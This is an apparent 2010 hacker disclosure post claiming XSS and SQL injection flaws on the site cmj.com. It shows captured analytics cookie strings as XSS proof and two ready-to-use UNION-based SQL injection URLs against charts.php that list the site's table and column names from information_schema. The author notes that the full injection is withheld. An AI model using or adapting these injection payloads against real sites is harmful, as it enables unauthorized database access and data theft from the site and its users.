Cmj.com XSS,SQL Injection Vulnerability

in

#Title: Cmj.com XSS,SQL Injection Vulnerability
#Risk: (5/5)
#Release Date: 23.08.2010
#Vulnerability discovered by: darknessn1k0!a
--------------------------------------------------------------------------------------
Xss (document.cookie)
#############################################################################
#_qca=P0-596185408-1282585686725; #__utmz=55724906.1282585701.1.1.utmcsr=cmj.com|utmccn=(referral)|utmcmd=referral|utmcct#=/charts.php; __utma=55724906.923282595.1282585701.1282585701.1282585701.1; #__utmb=55724906.1.10.1282585701; #__utmz=179622966.1282585703.1.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=p#hp%3Fid%3D9; __utma=179622966.217247712.1282585687.1282585687.1282586183.2; #__utmc=179622966; __utmb=179622966.3.10.1282586183
#############################################################################

Sqli
############################################################
http://cmj.com/charts.php?chart_type=-9%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_schema=database()--

#############################################################
http://cmj.com/charts.php?chart_type=-9%20union%20all%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns--

I didn't post the full injection for the security reason for this site.